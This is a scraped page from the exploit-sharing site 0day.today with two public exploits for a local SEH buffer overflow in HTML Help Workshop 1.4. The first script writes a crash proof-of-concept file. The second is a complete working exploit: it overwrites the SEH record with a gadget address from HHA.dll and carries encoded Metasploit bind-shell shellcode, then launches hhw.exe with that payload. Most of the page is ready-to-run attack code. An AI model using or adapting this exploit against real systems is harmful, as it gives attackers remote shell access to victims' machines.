0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

HTML Help Workshop 1.4 - (SEH) Buffer Overflow

Author

Moroccan Kingdom

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

#----------------------------------------------------------------------------------------------------#
# Exploit Title: HTML Help Workshop - (SEH) Buffer Overflow                                          #
# Date: August 24 2014                                                                               #
# Exploit Author: Moroccan Kingdom (MKD)                                                             #
# Software Link: http://msdn.microsoft.com/en-us/library/windows/desktop/ms669985%28v=vs.85%29.aspx  #                                     #
# Version: 1.4                                                                                       #
# Tested on: Windows XP SP3/SP2 | Windows 7 64/32-bit  (eng)                                         #
#----------------------------------------------------------------------------------------------------#
 
import subprocess,time
import sys,os
 
if os.name == "nt" :
   subprocess.call('cls', shell=True)
   os.system("color c")
else :
   subprocess.call('clear', shell=True)
 
time.sleep(1)
 
print '''
///////////////////////////////////////////////////////////////////////////////
/                               M.O.R.O.C.C.A.N                               /
/                                K.I.N.G.D.O.M                                /
/                                    [MKD]                                    /
/ CONTACT US : facebook.com/moroccankingdom024 | twitter.com/moroccankingdom  /
/ To run this exploit Go to DOS and then go to the folder path program and    /
/ run this command : hc | exm : hcc.exe AAAABBBCCCSSS...           /
/////////////////////////////////////////////////////////////////////////////// '''
 
JNK = "A" * 284
NEH = "B" * 4                  
SEH = "C" * 4               
SHL = "S" * 400
 
POC = JNK + NEH + SEH + SHL
 
try :
   file = open("poc.txt", "w")
   file.write(POC)
   file.close()
   print "\n[*] file created successfully"
except:
   print "[#] error to create file"
  
close = raw_input("\n[!] press any button to close()")



------------------------------------------------------------------------

import subprocess
 
# Exploit Title: HTML Help Workshop 1.4 - Local Buffer Overflow Exploit (SEH)
# Date: 31/08/2014
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/
# Software Link: http://msdn.microsoft.com/en-us/library/windows/desktop/ms669985%28v=vs.85%29.aspx
# Version: 1.4
# Tested on: Windows XP SP3 / Windows 7 Pro
 
junk = "A" * 832              # Junk bytes
nseh = "\xeb\x06\xff\xff"     # Overwrite next seh, with jump forward (over the next 6 bytes) instruction
seh  = "\xd0\x11\x30\x45"     # Overwrite seh with POP ECX,POP ESI,RETN from HHA.dll (Universal)
nops = "\x90" * 10            # Nops
 
#msfpayload windows/shell_bind_tcp EXITFUNC=seh R |
#msfencode -e x86/alpha_mixed -c 1 -b '\x00\x0a\x0d\xff'
shellcode = ("\x89\xe5\xd9\xc4\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
"\x42\x75\x4a\x49\x6b\x4c\x79\x78\x4f\x79\x65\x50\x57\x70"
"\x67\x70\x75\x30\x4c\x49\x58\x65\x30\x31\x69\x42\x30\x64"
"\x6c\x4b\x31\x42\x66\x50\x4e\x6b\x46\x32\x66\x6c\x6e\x6b"
"\x66\x32\x44\x54\x4c\x4b\x50\x72\x44\x68\x64\x4f\x68\x37"
"\x50\x4a\x65\x76\x65\x61\x4b\x4f\x46\x51\x4f\x30\x4e\x4c"
"\x55\x6c\x65\x31\x31\x6c\x36\x62\x44\x6c\x55\x70\x6b\x71"
"\x48\x4f\x44\x4d\x55\x51\x79\x57\x39\x72\x68\x70\x33\x62"
"\x66\x37\x6e\x6b\x42\x72\x36\x70\x6e\x6b\x42\x62\x45\x6c"
"\x56\x61\x68\x50\x6c\x4b\x61\x50\x61\x68\x6c\x45\x4f\x30"
"\x31\x64\x72\x6a\x75\x51\x78\x50\x42\x70\x6e\x6b\x30\x48"
"\x42\x38\x4e\x6b\x73\x68\x61\x30\x76\x61\x6e\x33\x69\x73"
"\x47\x4c\x72\x69\x6e\x6b\x77\x44\x4c\x4b\x65\x51\x79\x46"
"\x34\x71\x79\x6f\x50\x31\x4f\x30\x6c\x6c\x7a\x61\x38\x4f"
"\x54\x4d\x57\x71\x68\x47\x77\x48\x79\x70\x54\x35\x7a\x54"
"\x67\x73\x61\x6d\x79\x68\x65\x6b\x61\x6d\x36\x44\x61\x65"
"\x78\x62\x36\x38\x6e\x6b\x42\x78\x64\x64\x53\x31\x49\x43"
"\x63\x56\x4e\x6b\x66\x6c\x52\x6b\x4c\x4b\x53\x68\x35\x4c"
"\x55\x51\x59\x43\x6c\x4b\x43\x34\x6c\x4b\x57\x71\x38\x50"
"\x4c\x49\x72\x64\x77\x54\x51\x34\x53\x6b\x53\x6b\x50\x61"
"\x63\x69\x32\x7a\x42\x71\x59\x6f\x6b\x50\x36\x38\x71\x4f"
"\x71\x4a\x4e\x6b\x75\x42\x48\x6b\x4e\x66\x51\x4d\x43\x58"
"\x56\x53\x56\x52\x55\x50\x75\x50\x43\x58\x52\x57\x73\x43"
"\x45\x62\x61\x4f\x31\x44\x31\x78\x62\x6c\x43\x47\x66\x46"
"\x34\x47\x49\x6f\x5a\x75\x6c\x78\x6a\x30\x46\x61\x37\x70"
"\x63\x30\x34\x69\x4f\x34\x51\x44\x62\x70\x63\x58\x67\x59"
"\x4d\x50\x52\x4b\x43\x30\x39\x6f\x68\x55\x36\x30\x56\x30"
"\x46\x30\x66\x30\x73\x70\x72\x70\x71\x50\x52\x70\x70\x68"
"\x78\x6a\x44\x4f\x49\x4f\x4d\x30\x49\x6f\x49\x45\x6c\x49"
"\x79\x57\x66\x51\x39\x4b\x51\x43\x70\x68\x76\x62\x47\x70"
"\x66\x71\x33\x6c\x6d\x59\x79\x76\x43\x5a\x72\x30\x66\x36"
"\x36\x37\x52\x48\x69\x52\x4b\x6b\x65\x67\x72\x47\x59\x6f"
"\x69\x45\x76\x33\x31\x47\x62\x48\x6d\x67\x39\x79\x45\x68"
"\x79\x6f\x39\x6f\x4a\x75\x32\x73\x42\x73\x30\x57\x73\x58"
"\x44\x34\x4a\x4c\x55\x6b\x68\x61\x39\x6f\x69\x45\x70\x57"
"\x6b\x39\x4a\x67\x32\x48\x63\x45\x50\x6e\x62\x6d\x65\x31"
"\x39\x6f\x6e\x35\x73\x58\x72\x43\x42\x4d\x30\x64\x43\x30"
"\x6e\x69\x5a\x43\x56\x37\x73\x67\x43\x67\x66\x51\x7a\x56"
"\x33\x5a\x52\x32\x71\x49\x33\x66\x48\x62\x4b\x4d\x73\x56"
"\x59\x57\x72\x64\x66\x44\x47\x4c\x66\x61\x57\x71\x4e\x6d"
"\x67\x34\x31\x34\x46\x70\x79\x56\x75\x50\x57\x34\x70\x54"
"\x62\x70\x36\x36\x32\x76\x42\x76\x57\x36\x76\x36\x42\x6e"
"\x63\x66\x33\x66\x73\x63\x30\x56\x32\x48\x50\x79\x78\x4c"
"\x37\x4f\x4f\x76\x39\x6f\x4e\x35\x6c\x49\x79\x70\x50\x4e"
"\x52\x76\x61\x56\x39\x6f\x50\x30\x61\x78\x36\x68\x6d\x57"
"\x67\x6d\x53\x50\x79\x6f\x38\x55\x6d\x6b\x4b\x4e\x66\x6e"
"\x45\x62\x79\x7a\x33\x58\x59\x36\x4e\x75\x4f\x4d\x4d\x4d"
"\x39\x6f\x59\x45\x55\x6c\x56\x66\x33\x4c\x66\x6a\x6f\x70"
"\x79\x6b\x39\x70\x71\x65\x54\x45\x6d\x6b\x53\x77\x37\x63"
"\x73\x42\x42\x4f\x73\x5a\x77\x70\x70\x53\x79\x6f\x49\x45"
"\x41\x41")
 
exploit = junk + nseh + seh + nops + shellcode
subprocess.call(['C:\\Program Files\\HTML Help Workshop\\hhw.exe ',exploit])
 
# EOF

#  0day.today [2024-10-06]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

HTML Help Workshop 1.4 - (SEH) Buffer Overflow

Report Error

Report Error